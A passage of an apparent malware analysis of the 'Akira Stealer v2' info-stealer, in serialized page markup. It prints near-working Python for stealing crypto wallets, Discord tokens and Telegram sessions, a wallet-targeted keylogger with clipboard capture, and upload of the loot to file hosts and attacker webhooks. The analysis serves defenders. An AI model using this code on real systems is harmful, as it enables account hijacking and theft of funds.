f\"{ext_name}_{browser_name}\")\n",[102,15622,15623],{"class":104,"line":12758},[102,15624,15625],{},"            shutil.copytree(src, dest, dirs_exist_ok=True)\n",[102,15627,15628],{"class":104,"line":12764},[102,15629,15630],{},"            data.ext_wallets_count += 1\n",[1254,15632,15633,15639],{},[1257,15634,15635,15638],{},[251,15636,15637],{},"Files copied",": Extension-specific IndexedDB, LevelDB, JSON and config files containing encrypted keys, seed phrases, login credentials.",[1257,15640,15641,1061,15644,805,15647,11558],{},[251,15642,15643],{},"Outcome 
folder",[63,15645,15646],{},"Wallets/MetaMask_Chrome/",[63,15648,15649],{},"Wallets/Phantom_Edge/",[186,15651,15653],{"id":15652},"_782-desktop-wallet-applications","7.8.2 Desktop Wallet Applications",[12,15655,192],{},[12,15657,15658,15660],{},[251,15659,15509],{}," Major desktop clients such as Electrum, Exodus, Atomic Wallet, Guarda, Rabby, Coinomi, Zcash, Armory, Bytecoin, Jaxx, etc.",[56,15662,15664],{"className":12155,"code":15663,"language":12157,"meta":65,"style":65},"walletsDesktop = [\n    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), \"atomic\", \"Local Storage\", \"leveldb\")],\n    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n]\nfor name, path in walletsDesktop:\n    if os.path.isdir(path):\n        Utils.TaskKill(name.lower())\n        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n        shutil.copytree(path, dest, dirs_exist_ok=True)\n        data.desktop_wallets_count += 1\n",[63,15665,15666,15671,15676,15681,15686,15691,15696,15701,15705,15710,15715,15720,15725,15730],{"__ignoreMap":65},[102,15667,15668],{"class":104,"line":105},[102,15669,15670],{},"walletsDesktop = [\n",[102,15672,15673],{"class":104,"line":111},[102,15674,15675],{},"    [\"Electrum\",     os.path.join(os.getenv('APPDATA'), \"Electrum\", \"wallets\")],\n",[102,15677,15678],{"class":104,"line":329},[102,15679,15680],{},"    [\"Exodus\",       os.path.join(os.getenv('APPDATA'), \"Exodus\", \"exodus.wallet\")],\n",[102,15682,15683],{"class":104,"line":346},[102,15684,15685],{},"    [\"AtomicWallet\", os.path.join(os.getenv('LOCALAPPDATA'), 
\"atomic\", \"Local Storage\", \"leveldb\")],\n",[102,15687,15688],{"class":104,"line":650},[102,15689,15690],{},"    [\"Guarda\",       os.path.join(os.getenv('APPDATA'), \"Guarda\", \"Local Storage\", \"leveldb\")],\n",[102,15692,15693],{"class":104,"line":656},[102,15694,15695],{},"    [\"Rabby\",        os.path.join(os.getenv('APPDATA'), \"rabby-desktop\")],\n",[102,15697,15698],{"class":104,"line":662},[102,15699,15700],{},"    [\"Coinomi\",      os.path.join(os.getenv('APPDATA'), \"Coinomi\", \"wallets\")],\n",[102,15702,15703],{"class":104,"line":668},[102,15704,15585],{},[102,15706,15707],{"class":104,"line":674},[102,15708,15709],{},"for name, path in walletsDesktop:\n",[102,15711,15712],{"class":104,"line":680},[102,15713,15714],{},"    if os.path.isdir(path):\n",[102,15716,15717],{"class":104,"line":12692},[102,15718,15719],{},"        Utils.TaskKill(name.lower())\n",[102,15721,15722],{"class":104,"line":12698},[102,15723,15724],{},"        dest = os.path.join(Utils.get_temp_folder(), \"Wallets\", name)\n",[102,15726,15727],{"class":104,"line":12704},[102,15728,15729],{},"        shutil.copytree(path, dest, dirs_exist_ok=True)\n",[102,15731,15732],{"class":104,"line":12710},[102,15733,15734],{},"        data.desktop_wallets_count += 1\n",[1254,15736,15737,15750],{},[1257,15738,15739,15742,15743,805,15746,15749],{},[251,15740,15741],{},"Data stolen",": Keystore files (",[63,15744,15745],{},"*.dat",[63,15747,15748],{},"*.json","), private key exports, wallet configuration and transaction history.",[1257,15751,15752,15755],{},[251,15753,15754],{},"Benefit",": Offline wallet contents usable by the attacker to authorize transactions.",[186,15757,15759],{"id":15758},"_783-discord-token-harvest","7.8.3 Discord Token Harvest",[12,15761,192],{},[12,15763,15764],{},"Discord tokens are authentication artifacts—essentially long-lived bearer tokens—that can grant full access to a user’s account without requiring their credentials or MFA. 
Akira exploits this by scanning browser and app data folders for tokens stored by various Discord clients, including Discord Stable, Canary, PTB (Public Test Build), and even modified forks like Lightcord.",[12,15766,15767],{},"The technique targets LevelDB files under the application's Local Storage, where authentication tokens often remain in plaintext. Using regular expressions, the malware scans these .log and .ldb files for patterns that match either regular user tokens or MFA-enabled tokens.",[12,15769,15770],{},"To increase reliability and reduce noise, Akira includes a validation step: it sends a test request to Discord’s /users/@me endpoint using each harvested token. Only tokens that successfully authenticate (HTTP 200) are exfiltrated via webhook—typically to a Discord channel under attacker control.",[12,15772,15773],{},"This method allows attackers to hijack Discord accounts in real time, impersonate the victim, scrape DMs and guilds, or deploy further malware through social engineering—all without triggering login alerts.",[56,15775,15777],{"className":12155,"code":15776,"language":12157,"meta":65,"style":65},"import re, requests\npatterns = [\n    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n]\ndef harvest_discord(base, webhook_url):\n    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n    for file in os.listdir(db_dir):\n        if file.endswith(('.log', '.ldb')):\n            for line in open(os.path.join(db_dir, file), errors='ignore'):\n                for pat in patterns:\n                    for token in re.findall(pat, line):\n                        # Verify token\n                        h = {\"Authorization\": token}\n                        r = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n                        if r.status_code == 200:\n                            uname = r.json()[\"username\"] + \"#\" + 
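The regex-then-probe flow described for section 7.8.3 sends every hit to Discord's `/users/@me` endpoint to learn which are real. As an added example, not the stealer's code and not from the post, here is the offline triage a responder can run over the same LevelDB hits first: the first dot-separated segment of a user token is the base64 of the numeric account ID, so a hit that does not decode to digits is regex noise, and a surviving ID carries the account's creation time in the top 42 bits of the snowflake. `find_candidates`, `token_user_id`, `snowflake_created` and `triage` are this example's names; the sample LevelDB fragment, the fake token and the junk string are constructed here and are not real credentials.

```python
import base64
import re
from datetime import datetime, timezone

DISCORD_EPOCH_MS = 1420070400000            # 2015-01-01T00:00:00Z, the snowflake epoch

# The same two shapes the stealer greps LevelDB .log/.ldb files for.
TOKEN_PATTERNS = (
    re.compile(r"[\w-]{24}\.[\w-]{6}\.[\w-]{27,100}"),   # user tokens
    re.compile(r"mfa\.[\w-]{84,100}"),                   # MFA tokens
)


def find_candidates(text):
    """All substrings matching either pattern, in order of appearance."""
    hits = []
    for pat in TOKEN_PATTERNS:
        hits.extend(pat.findall(text))
    return hits


def token_user_id(token):
    """The first segment of a user token is base64 of the numeric account ID.
    Returns that ID, or None when the segment does not decode to digits
    (regex noise) or the token is an mfa.* token (no embedded ID)."""
    if token.startswith("mfa."):
        return None
    head = token.split(".", 1)[0]
    try:
        raw = base64.urlsafe_b64decode(head + "=" * (-len(head) % 4))
    except ValueError:                        # binascii.Error is a ValueError
        return None
    return int(raw) if raw.isdigit() else None


def snowflake_created(user_id):
    """Account creation time carried in the snowflake's top 42 bits (ms since the epoch above)."""
    ms = (user_id >> 22) + DISCORD_EPOCH_MS
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc)


def triage(text):
    """Map each candidate to its decoded user ID (None = implausible). This is
    the offline pre-filter; only survivors would merit any further check."""
    return {tok: token_user_id(tok) for tok in find_candidates(text)}


# Constructed sample: a LevelDB-looking fragment holding a fake token built
# around a made-up account ID, plus a junk string of the right shape.
FAKE_UID = 123456789012345678
FAKE_TOKEN = base64.b64encode(str(FAKE_UID).encode()).decode() + ".G7Qz_x." + "a" * 38
JUNK = "x" * 24 + ".abcdef." + "y" * 30
SAMPLE_LDB = f'\x00\x01_https://discord.com\x00\x01token\x01"{FAKE_TOKEN}"\x00leveldb-noise {JUNK} tail'

if __name__ == "__main__":
    for tok, uid in triage(SAMPLE_LDB).items():
        print(tok[:12] + "...", uid, snowflake_created(uid).date() if uid else "-")
```

A hit whose decoded ID maps to an account created after the host was imaged, or to an ID that does not belong to the user of that profile, is worth a closer look before anyone considers replaying it; no token ever needs to be sent to Discord to get that far.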
r.json()[\"discriminator\"]\n                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n                            requests.post(webhook_url, json=payload)\n",[63,15778,15779,15784,15789,15794,15799,15803,15808,15813,15818,15823,15828,15833,15838,15843,15848,15853,15858,15863,15868],{"__ignoreMap":65},[102,15780,15781],{"class":104,"line":105},[102,15782,15783],{},"import re, requests\n",[102,15785,15786],{"class":104,"line":111},[102,15787,15788],{},"patterns = [\n",[102,15790,15791],{"class":104,"line":329},[102,15792,15793],{},"    r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27,100}\",  # User tokens\n",[102,15795,15796],{"class":104,"line":346},[102,15797,15798],{},"    r\"mfa\\.[\\w-]{84,100}\"                      # MFA tokens\n",[102,15800,15801],{"class":104,"line":650},[102,15802,15585],{},[102,15804,15805],{"class":104,"line":656},[102,15806,15807],{},"def harvest_discord(base, webhook_url):\n",[102,15809,15810],{"class":104,"line":662},[102,15811,15812],{},"    db_dir = os.path.join(base, \"Local Storage\", \"leveldb\")\n",[102,15814,15815],{"class":104,"line":668},[102,15816,15817],{},"    for file in os.listdir(db_dir):\n",[102,15819,15820],{"class":104,"line":674},[102,15821,15822],{},"        if file.endswith(('.log', '.ldb')):\n",[102,15824,15825],{"class":104,"line":680},[102,15826,15827],{},"            for line in open(os.path.join(db_dir, file), errors='ignore'):\n",[102,15829,15830],{"class":104,"line":12692},[102,15831,15832],{},"                for pat in patterns:\n",[102,15834,15835],{"class":104,"line":12698},[102,15836,15837],{},"                    for token in re.findall(pat, line):\n",[102,15839,15840],{"class":104,"line":12704},[102,15841,15842],{},"                        # Verify token\n",[102,15844,15845],{"class":104,"line":12710},[102,15846,15847],{},"                        h = {\"Authorization\": token}\n",[102,15849,15850],{"class":104,"line":12716},[102,15851,15852],{},"                        r = 
requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=h)\n",[102,15854,15855],{"class":104,"line":12722},[102,15856,15857],{},"                        if r.status_code == 200:\n",[102,15859,15860],{"class":104,"line":12728},[102,15861,15862],{},"                            uname = r.json()[\"username\"] + \"#\" + r.json()[\"discriminator\"]\n",[102,15864,15865],{"class":104,"line":12734},[102,15866,15867],{},"                            payload = {\"content\": f\"**Discord** {uname}: `{token}`\"}\n",[102,15869,15870],{"class":104,"line":12740},[102,15871,15872],{},"                            requests.post(webhook_url, json=payload)\n",[1254,15874,15875],{},[1257,15876,15877,15880],{},[251,15878,15879],{},"Validation",": Only posts valid tokens, preventing stale JWTs from being sent.",[186,15882,15884],{"id":15883},"_784-telegram-session-files","7.8.4 Telegram Session Files",[12,15886,192],{},[12,15888,15889,15891],{},[251,15890,15509],{}," Telegram Desktop/TData",[56,15893,15895],{"className":12155,"code":15894,"language":12157,"meta":65,"style":65},"def steal_telegram(tdata_path, dest_root):\n    if os.path.exists(tdata_path):\n        Utils.TaskKill(\"telegram.exe\")\n        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n        shutil.copytree(tdata_path, dest, dirs_exist_ok=True)\n        data.has_telegram = True\n",[63,15896,15897,15902,15907,15912,15917,15922],{"__ignoreMap":65},[102,15898,15899],{"class":104,"line":105},[102,15900,15901],{},"def steal_telegram(tdata_path, dest_root):\n",[102,15903,15904],{"class":104,"line":111},[102,15905,15906],{},"    if os.path.exists(tdata_path):\n",[102,15908,15909],{"class":104,"line":329},[102,15910,15911],{},"        Utils.TaskKill(\"telegram.exe\")\n",[102,15913,15914],{"class":104,"line":346},[102,15915,15916],{},"        dest = os.path.join(dest_root, \"Wallets\", \"Telegram\")\n",[102,15918,15919],{"class":104,"line":650},[102,15920,15921],{},"        shutil.copytree(tdata_path, dest, 
dirs_exist_ok=True)\n",[102,15923,15924],{"class":104,"line":656},[102,15925,15926],{},"        data.has_telegram = True\n",[1254,15928,15929,15942],{},[1257,15930,15931,1061,15934,15937,15938,15941],{},[251,15932,15933],{},"Files",[63,15935,15936],{},"tdata"," folder containing session keys, ",[63,15939,15940],{},"D877F..."," folder with secret/unsecret files.",[1257,15943,15944,15947],{},[251,15945,15946],{},"Use",": Load into attacker’s Telegram client for full account access.",[186,15949,15951],{"id":15950},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[12,15953,192],{},[12,15955,15956],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[12,15958,15959],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. 
This approach is extremely effective because it combines two attack vectors:",[1254,15961,15962,15965],{},[1257,15963,15964],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[1257,15966,15967],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[12,15969,15970],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[56,15972,15974],{"className":12155,"code":15973,"language":12157,"meta":65,"style":65},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[63,15975,15976,15981,15985,15990,15995,16000,16005,16010,16014,16019,16024,16029,16034,16039,16044,16049,16054],{"__ignoreMap":65},[102,15977,15978],{"class":104,"line":105},[102,15979,15980],{},"import keyboard, pyperclip\n",[102,15982,15983],{"class":104,"line":111},[102,15984,11519],{"emptyLinePlaceholder":2181},[102,15986,15987],{"class":104,"line":329},[102,15988,15989],{},"class WalletKeylogger:\n",[102,15991,15992],{"class":104,"line":346},[102,15993,15994],{},"    def __init__(self, wallet_titles):\n",[102,15996,15997],{"class":104,"line":650},[102,15998,15999],{},"        self.buf = \"\"\n",[102,16001,16002],{"class":104,"line":656},[102,16003,16004],{},"        keyboard.on_release(self.capture)\n",[102,16006,16007],{"class":104,"line":662},[102,16008,16009],{},"        self.wallet_titles = 
wallet_titles\n",[102,16011,16012],{"class":104,"line":668},[102,16013,11519],{"emptyLinePlaceholder":2181},[102,16015,16016],{"class":104,"line":674},[102,16017,16018],{},"    def capture(self, event):\n",[102,16020,16021],{"class":104,"line":680},[102,16022,16023],{},"        title = pygetwindow.getActiveWindow().title\n",[102,16025,16026],{"class":104,"line":12692},[102,16027,16028],{},"        if any(w in title for w in self.wallet_titles):\n",[102,16030,16031],{"class":104,"line":12698},[102,16032,16033],{},"            if event.name == 'enter':\n",[102,16035,16036],{"class":104,"line":12704},[102,16037,16038],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[102,16040,16041],{"class":104,"line":12710},[102,16042,16043],{},"                send_to_webhook(data)\n",[102,16045,16046],{"class":104,"line":12716},[102,16047,16048],{},"                self.buf = \"\"\n",[102,16050,16051],{"class":104,"line":12722},[102,16052,16053],{},"            else:\n",[102,16055,16056],{"class":104,"line":12728},[102,16057,16058],{},"                self.buf += event.name\n",[1254,16060,16061,16067],{},[1257,16062,16063,16066],{},[251,16064,16065],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[1257,16068,16069,16072],{},[251,16070,16071],{},"Clipboard",": Captures copied seeds or private keys.",[186,16074,16076],{"id":16075},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[12,16078,192],{},[12,16080,16081],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. 
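The upload-then-report sequence laid out in section 5 (Exfiltration & Cleanup) and again in this section is a pattern a SOC can look for on the egress side, where the local cleanup does not reach. The block below is an added example, not code from the post or from Akira: it parses a constructed proxy log (line format, field order and the exact upload paths are assumed for the example), treats successful POSTs to the three file hosts as uploads and Discord-webhook or Telegram-bot calls as reports, and raises an alert when one client does both within a short window. `parse`, `classify` and `detect` are this example's own names.

```python
import re
from datetime import datetime

# Anonymous file hosts the stealer tries in order and the chat APIs it reports to.
# Suffix matching also covers api.gofile.io and the storeN.gofile.io upload servers.
FILE_HOSTS = ("gofile.io", "file.io", "oshi.at")
DISCORD_DOMAIN = re.compile(r"^(?:canary\.|ptb\.)?discord(?:app)?\.com$")
TELEGRAM_BOT_PATH = re.compile(r"^/bot\d+:[\w-]+/")

# Assumed proxy log shape for this example:
#   <ISO-8601 UTC time> <client IP> <method> <URL> <status>
LINE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT) (https?://)([^/\s]+)(/\S*)? (\d{3})$")


def parse(line):
    """One log line -> event dict, or None for lines that do not fit the format."""
    m = LINE.match(line)
    if not m:
        return None
    ts, src, method, _scheme, domain, path, status = m.groups()
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
            "method": method, "domain": domain.lower(), "path": path or "/",
            "status": int(status)}


def classify(ev):
    """'upload' for a successful write to a file host, 'report' for a webhook
    or bot call, None otherwise. Downloads (GET) and failed requests are ignored."""
    if ev["method"] == "GET" or ev["status"] >= 400:
        return None
    d, p = ev["domain"], ev["path"]
    if any(d == h or d.endswith("." + h) for h in FILE_HOSTS):
        return "upload"
    if DISCORD_DOMAIN.match(d) and p.startswith("/api/webhooks/"):
        return "report"
    if d == "api.telegram.org" and TELEGRAM_BOT_PATH.match(p):
        return "report"
    return None


def detect(log_text, window_s=300):
    """Pair each report with the most recent upload from the same client that
    happened no more than window_s seconds earlier.
    Returns [(src, upload_domain, report_domain, seconds_between), ...]."""
    events = sorted(filter(None, map(parse, log_text.splitlines())), key=lambda e: e["ts"])
    last_upload, alerts = {}, []
    for ev in events:
        kind = classify(ev)
        if kind == "upload":
            last_upload[ev["src"]] = ev
        elif kind == "report":
            up = last_upload.get(ev["src"])
            if up is not None:
                gap = (ev["ts"] - up["ts"]).total_seconds()
                if gap <= window_s:
                    alerts.append((ev["src"], up["domain"], ev["domain"], int(gap)))
    return alerts


# Constructed sample log: one host that uploads to GoFile and reports to a
# Discord webhook, one that only downloads from file.io and messages a bot much
# later, and one that falls back to oshi.at before a Telegram report.
SAMPLE_LOG = """\
2026-03-12T06:25:01Z 10.0.0.7 GET https://api.gofile.io/servers 200
2026-03-12T06:25:02Z 10.0.0.7 POST https://store4.gofile.io/contents/uploadfile 200
2026-03-12T06:25:04Z 10.0.0.7 POST https://discord.com/api/webhooks/1111/abc 204
2026-03-12T06:30:00Z 10.0.0.9 GET https://file.io/abcd1234 200
2026-03-12T07:10:00Z 10.0.0.9 POST https://api.telegram.org/bot123:ABC-def/sendDocument 200
2026-03-12T06:40:00Z 10.0.0.12 POST https://oshi.at/ 200
2026-03-12T06:40:30Z 10.0.0.12 POST https://api.telegram.org/bot123:ABC-def/sendMessage 200
"""

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print("upload-then-report: src=%s upload=%s report=%s dt=%ss" % alert)
```

Because the stealer posts the report even when every upload fails, a second rule that fires on a Discord-webhook or Telegram-bot POST from any host that has no business reaching those APIs catches the failure path as well; the pairing above is the higher-confidence signal.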
The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[12,16083,16084],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[56,16086,16088],{"className":12155,"code":16087,"language":12157,"meta":65,"style":65},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & 
ZIP\nUtils.clear_client_folder()\n",[63,16089,16090,16095,16100,16105,16110,16115,16120,16125,16130,16135,16140,16145,16150,16155,16160,16164,16169,16174],{"__ignoreMap":65},[102,16091,16092],{"class":104,"line":105},[102,16093,16094],{},"# 1) ZIP everything (including Wallets folder)\n",[102,16096,16097],{"class":104,"line":111},[102,16098,16099],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[102,16101,16102],{"class":104,"line":329},[102,16103,16104],{},"# 2) Attempt upload to primary & fallback services\n",[102,16106,16107],{"class":104,"line":346},[102,16108,16109],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[102,16111,16112],{"class":104,"line":650},[102,16113,16114],{},"# 3) Report summary\n",[102,16116,16117],{"class":104,"line":656},[102,16118,16119],{},"embed = {\n",[102,16121,16122],{"class":104,"line":662},[102,16123,16124],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[102,16126,16127],{"class":104,"line":668},[102,16128,16129],{},"    \"fields\": [\n",[102,16131,16132],{"class":104,"line":674},[102,16133,16134],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[102,16136,16137],{"class":104,"line":680},[102,16138,16139],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[102,16141,16142],{"class":104,"line":12692},[102,16143,16144],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[102,16146,16147],{"class":104,"line":12698},[102,16148,16149],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[102,16151,16152],{"class":104,"line":12704},[102,16153,16154],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[102,16156,16157],{"class":104,"line":12710},[102,16158,16159],{},"    
]\n",[102,16161,16162],{"class":104,"line":12716},[102,16163,10086],{},[102,16165,16166],{"class":104,"line":12722},[102,16167,16168],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[102,16170,16171],{"class":104,"line":12728},[102,16172,16173],{},"# 4) Cleanup local folder & ZIP\n",[102,16175,16176],{"class":104,"line":12734},[102,16177,15360],{},[41,16179,16181,16182,1288],{"id":16180},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[63,16183,9018],{},[12,16185,47],{},[12,16187,16188,16189,16191],{},"Akira Stealer v2’s ",[251,16190,9018],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[186,16193,16195],{"id":16194},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[12,16197,192],{},[12,16199,16200],{},"Upon instantiation, the constructor builds two sets of target paths:",[56,16202,16204],{"className":12155,"code":16203,"language":12157,"meta":65,"style":65},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[63,16205,16206,16211,16216,16221,16226,16230,16234,16238,16243,16248,16253,16258,16262],{"__ignoreMap":65},[102,16207,16208],{"class":104,"line":105},[102,16209,16210],{},"# Discord client LevelDB directories\n",[102,16212,16213],{"class":104,"line":111},[102,16214,16215],{},"discord_paths = 
[\n",[102,16217,16218],{"class":104,"line":329},[102,16219,16220],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[102,16222,16223],{"class":104,"line":346},[102,16224,16225],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[102,16227,16228],{"class":104,"line":650},[102,16229,11509],{},[102,16231,16232],{"class":104,"line":656},[102,16233,15585],{},[102,16235,16236],{"class":104,"line":662},[102,16237,11519],{"emptyLinePlaceholder":2181},[102,16239,16240],{"class":104,"line":668},[102,16241,16242],{},"# Chromium-based browser LevelDB directories\n",[102,16244,16245],{"class":104,"line":674},[102,16246,16247],{},"browserPaths = [\n",[102,16249,16250],{"class":104,"line":680},[102,16251,16252],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[102,16254,16255],{"class":104,"line":12692},[102,16256,16257],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[102,16259,16260],{"class":104,"line":12698},[102,16261,11509],{},[102,16263,16264],{"class":104,"line":12704},[102,16265,15585],{},[1254,16267,16268,16277],{},[1257,16269,16270,16273,16274,1013],{},[251,16271,16272],{},"Discord Paths"," target official and unofficial Discord clients under ",[63,16275,16276],{},"%APPDATA%",[1257,16278,16279,16282],{},[251,16280,16281],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[12,16284,16285],{},"Threads are spawned for each entry:",[56,16287,16289],{"className":12155,"code":16288,"language":12157,"meta":65,"style":65},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    
t.start()\n",[63,16290,16291,16296,16301,16306,16311,16316],{"__ignoreMap":65},[102,16292,16293],{"class":104,"line":105},[102,16294,16295],{},"for patt in browserPaths:\n",[102,16297,16298],{"class":104,"line":111},[102,16299,16300],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[102,16302,16303],{"class":104,"line":329},[102,16304,16305],{},"    t.start()\n",[102,16307,16308],{"class":104,"line":346},[102,16309,16310],{},"for patt in discord_paths:\n",[102,16312,16313],{"class":104,"line":650},[102,16314,16315],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[102,16317,16318],{"class":104,"line":656},[102,16319,16305],{},[12,16321,16322],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[186,16324,16326],{"id":16325},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[12,16328,192],{},[12,16330,16331],{},[251,16332,16333],{},"Plaintext Token Scraping from Browsers",[12,16335,16336,16339,16340,2901,16343,16346],{},[63,16337,16338],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[63,16341,16342],{},".log",[63,16344,16345],{},".ldb"," files:",[56,16348,16350],{"className":12155,"code":16349,"language":12157,"meta":65,"style":65},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[63,16351,16352,16357,16362,16367,16372,16377,16382,16387],{"__ignoreMap":65},[102,16353,16354],{"class":104,"line":105},[102,16355,16356],{},"for file in os.listdir(path + arg):\n",[102,16358,16359],{"class":104,"line":111},[102,16360,16361],{},"    if file.endswith((\".log\", 
